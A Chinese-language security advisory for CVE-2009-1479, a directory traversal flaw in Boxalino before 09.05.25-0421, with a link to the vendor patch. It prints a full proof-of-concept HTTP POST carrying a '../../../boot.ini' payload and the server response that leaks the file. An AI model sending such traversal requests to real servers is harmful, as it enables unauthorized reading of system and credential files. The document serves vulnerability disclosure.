安全研究

安全漏洞
Boxalino HTTP请求目录遍历漏洞

发布日期:2009-10-20
更新日期:2009-10-21

受影响系统:
Boxalino AG Boxalino < 09.05.25-0421
不受影响系统:
Boxalino AG Boxalino 09.05.25-0421
描述:
CVE(CAN) ID: CVE-2009-1479

Boxalino解决方案是综合的企业协作平台。

Boxalino产品没有检查用户所提交HTTP请求中的目录遍历标识符,远程攻击者可以通过在请求中包含“../../../”序列执行目录遍历攻击,读取服务器文件系统上的任意文件。

<*来源:Axel Neumann (axel.neumann@csnc.ch
  
  链接:http://marc.info/?l=bugtraq&m=125605315822384&w=2
        http://secunia.com/advisories/36960/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

POST /boxalino/client/desktop/default.htm HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Host: www.example.ch
Content-Length: 256
Cookie: JSESSIONID=A57AABD5F2051C4333F500EBB1232295
Connection: Close
Pragma: no-cache

url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Content-Type: text/html
Content-Length: 208
Date: Wed, 29 Apr 2009 09:01:06 GMT
Connection: close


[boot loader] timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003,
Standard" /noexecute=optout /fastdetect

建议:
厂商补丁:

Boxalino AG
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.boxalino.com/

浏览次数:3350
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障